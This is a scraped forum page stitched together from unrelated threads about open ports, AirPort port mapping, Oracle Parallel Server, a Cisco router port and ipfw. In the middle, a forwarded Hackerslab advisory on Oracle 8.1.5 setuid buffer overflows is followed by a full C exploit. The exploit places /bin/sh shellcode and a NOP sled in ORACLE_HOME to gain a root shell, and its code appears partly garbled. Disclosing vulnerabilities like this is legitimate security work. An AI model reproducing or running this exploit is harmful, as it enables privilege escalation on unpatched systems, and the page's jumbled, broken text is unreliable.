192.168.223.1Discovered open port 563/tcp on
192.168.223.1Discovered open port 587/tcp on
*192.168.223.1Discovered open port 631/tcp on
192.168.223.1Discovered open port 993/tcp on
192.168.223.1Discovered open port 995/tcp on
*192.168.223.1Discovered open port 7435/tcp on
*192.168.223.1Discovered open port 6839/tcp on
*192.168.223.1Discovered open port 8080/tcp on
192.168.223.1Discovered open port 8089/tcp on
*192.168.223.1Discovered open port 9100/tcp on
*192.168.223.1Discovered open port 9220/tcp on

How do I open ports on my airport extreme and assign a fixed IP Address for a device connected to my network?

I recently had a security system installed in my house. One of the features is an EPAD which enables me to have a virtual keypad on my iphone, and computer to operate the alarm system. The technician was not familiar with Mac's and Airports. How do I open port 80 to 80 in my airport and assign a fixed IP address for the EPAD? Apparently this is what is needed to make this work.

There are three ranges of "strictly local" IP addresses reserved for local Network use:
192.168.xxx.yyy
172.16.xxx.yyy
10.xxx.yyy.zzz
What your Router does for you is to act as your agent on the Internet.Your requests are packaged up and forwarded on your behalf, and only when a response is expected is the response returned to your local IP address.
Directing Network Traffic to a Specific Computer on Your
Network (Port Mapping)
AirPort Extreme uses Network Address Translation (NAT) to share a single IP address with the computers that join the AirPort Extreme network. To provide Internet access to several computers with one IP address, NAT assigns private IP addresses to each computer on the AirPort Extreme network, and then matches these addresses with port numbers. The wireless device creates a port-to-private IP address table entry when a computer on your AirPort (private) network sends a request for information to the Internet.
If you’re using a web, AppleShare, or FTP server on your AirPort Extreme network, other computers initiate communication with your server. Because the Apple wireless device has no table entries for these requests, it has no way of directing the information to the appropriate computer on your AirPort network.
To ensure that requests are properly routed to your web, AppleShare, or FTP server, you need to establish a permanent IP address for your server and provide inbound port mapping information to your Apple wireless device.
To set up inbound port mapping:
1) Open AirPort Utility, select your wireless device, and then choose Base Station > Manual Setup, or double-click the device icon to open its configuration in a separate window. Enter the password if necessary.
2) Click the Advanced button, and then click Port Mapping.
3) Click the Add button and choose a service, such as Personal File Sharing, from the Service pop-up menu.

Security vulnerability in Oracle 8.1.5

The following email was forwarded to me about possible security vulnerabilities.
I am looking for verification from both Oracle and the user comunity.
================================================================================
[ Hackerslab bug_paper ] Linux ORACLE 8.1.5 vulnerability
================================================================================
File : Oracle 8.1.5
SYSTEM : LINUX
Tested by RedHat Linux 6.2
INFO :
There are two security vulnerability in Oracle.
1. buffer overflow
It is possible to create a buffer overflow vulnerability using "ORACLE_HOME",
one of the environmental value of Oracle.
Oracle applications that are vulnerable to buffer overflow are as follow :
- names
- namesctl
- onrsd
- osslogin
- tnslsnr
- tnsping
- trcasst
- trcroute
Thease applications allow an attacker to excute a buffer overflow exploit.
2. Log-files created
When a user excutes one of Oracle applications such as names, oracle or tnslsnr,
following log files are created.
names
======
-rw-rw-r-- 1 oracle dba 0 Oct 20 01:45 ckpcch.ora
-rw-rw-r-- 1 oracle dba 428 Oct 20 01:45 ckpreg.ora
-rw-rw-r-- 1 oracle dba 950 Oct 20 01:45 names.log
oracle
======
-rw-rw---- 1 oracle dba 616 Oct 20 05:14 ora_[running pid].trc
tnslsnr
=======
-rw-rw-r-- 1 oracle dba 2182176 Oct 20 2000 listener.log
SOLUTION
Contact your vendor for a patch or close setuid permission.
# su - oracle
$ cd /oracle_8.1.5_install_directory/bin
$ chmod a-s names namesctl onrsd osslogin tnslsnr tnsping trcasst trcroute
==-------------------------------------------------------------------------------==
* ** ** * [email protected] [yong-jun, kim]
* ** ** * [ [URL=http://www.hackerslab.org]http://www.hackerslab.org ]
******** HACKERSLAB (C) since 1999
==-------------------------------------------------------------------------------==
Oracle 8.1.5 exploit
-by loveyou
offset value : -500 ~ +500
#include <stdio.h>
#include <stdlib.h>
#define BUFFER 800
#define NOP 0x90
#define PATH "/hackerslab/loveyou/oracle/8.1.5/bin/names"
char shellcode[] =
/* - K2 - */
/* main: */
"\xeb\x1d" /* jmp callz */
/* start: */
"\x5e" /* popl %esi */
"\x29\xc0" /* subl %eax, %eax */
"\x88\x46\x07" /* movb %al, 0x07(%esi) */
"\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */
"\x89\x76\x08" /* movl %esi, 0x08(%esi) */
"\xb0\x0b" /* movb $0x0b, %al */
"\x87\xf3" /* xchgl %esi, %ebx */
"\x8d\x4b\x08" /* leal 0x08(%ebx), %ecx */
"\x8d\x53\x0c" /* leal 0x0c(%ebx), %edx */
"\xcd\x80" /* int $0x80 */
"\x29\xc0" /* subl %eax, %eax */
"\x40" /* incl %eax */
"\xcd\x80" /* int $0x80 */
/* callz: */
"\xe8\xde\xff\xff\xff" /* call start */
"/bin/sh";
unsigned long getesp(void)
__asm__("movl %esp,%eax");
int main(int argc, char *argv[])
char buff, ptr,binary[120];
long *addr_ptr, addr;
int bsize=BUFFER;
int i,offset;
offset = 0 ;
if ( argc > 1 ) offset = atoi(argv[1]);
buff = malloc(bsize);
addr = getesp() - 5933 - offset;
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
memset(buff,bsize/2,NOP);
ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode;
buff[bsize - 1] = '\0';
setenv("ORACLE_HOME",buff,1);
printf("[ offset:%d buffer=%d ret:0x%x ]\n",
offset,strlen(buff),addr);
system(PATH);
null

Hi Peter,
I was told that Oracle8 and Oracle8i Parallel Server on IBM
RS/6000 AIX comes with its own Lock Manager and this LM does not
rely on the Cluster Lock Manager (cllockd) of HACMP for AIX, as
Oracle7 Parallel Server on normal (non-SP) RS/6000 does.
(Oracle7 Parallel Server on RS/6000 SP didn't use the cllockd of
HACMP but came with a special LM.)
Cluster-wide Filesystems are not used for OPS on Unix, as far as
I know Unix (AIX, Solaris). All Data-, Log- and Control-Files
must reside on concurrently (!) accessible Raw-Devices (e.g. Raw
Logical Volumes on AIX).
So I guess it should be possible for Oracle to port OPS to Linux.
No special Cluster-Services would be needed for OPS on Linux,
just a shared SCSI-bus (e.g.) and a fast interconnect (e.g.
100BaseT).
Peter Sechser (guest) wrote:
: Dave,
: Parallel Server needs some cluster services in order to
: communicate between several nodes. So, the operating system has
: to offer things like inter-node communication services,
: cluster-wide lock communication services and a clusterwide
: filesystem. I'm not quite sure, to what degree Linux
offers/will
: offer these services.
: Peter
null

Open port 916/udp not closeable

A nmap scan from the Internet (WAN) against a Cisco RV120W shows an open port 916/udp. This port remains open even if one writes an explicit access rule for the firewall.
A quick googling shows that this port is probably used to access the firmware of the router from the outside as well as it has been involved in security problems some years ago. See http://osvdb.org/show/osvdb/34520
How can this port be closed?
Michael

Dear Michael,
Thank you for reaching the Small Business Support Community.
I would first suggest you to upgrade to the latest firmware release version 1.0.4.10;
http://software.cisco.com/download/release.html?mdfid=282981372&softwareid=282487380&release=1.0.4.10
If nmap still shows the port opened, I then suggest you to disable the remote management to determine if this is the root of the problem, then contact the Small Business Support Center to have a TAC engineer figure this out;
https://www.cisco.com/en/US/support/tsd_cisco_small_business_support_center_contacts.html
Please do not hesitate to reach me back if there is anything I may assist you with.
Kind regards,
Jeffrey Rodriguez S. .:|:.:|:.
Cisco Customer Support Engineer
*Please rate the Post so other will know when an answer has been found.

Sudo ipfw list open port?

So i did a "sudo ipfw list" in the terminal window and i got an open 63353 port. Naturally, I assumed that since my P2P software was just opened, and I said yes to the Leopard app firewall, it was this port number that was assigned to the P2P app.
Now, I went into my router and also opened up the same corresponding number there (both tcp & udp).
Still I'm getting a message saying the port is stealth.
Am I correct in assuming that the Leo app firewall did open 63353 for P2P or does it conceal open ports from a sudo list command?
Also, is the app firewall stealthing its open ports too? This would mean that if the router is set to stealth and app firewall is stealth, I get a double stealth port? huh does this make sense? I have never had to remove the "stealth ports" from the router before. There has been no prob on that end.
Any help from apple would be greatly appreciated.

I only enable my firewall on my laptop as it moves around and joins many different networks. That being said I have locked it down using the Application Firewall and IPFW.
However my desktop computers in my office rely on the firewall my router provides. I use little snitch to firewall my outgoing connections and that is enough security for me.
I will turn it off completely and just run the firewall on the router and hope it works like it use to. thx all.
If you turn it off you can also flush out any IPFW rules with the command
sudo ipfw flush

WRT1900AC - Open Port - 52147 - Security Vulnerability?

Similar Messages

Maybe you are looking for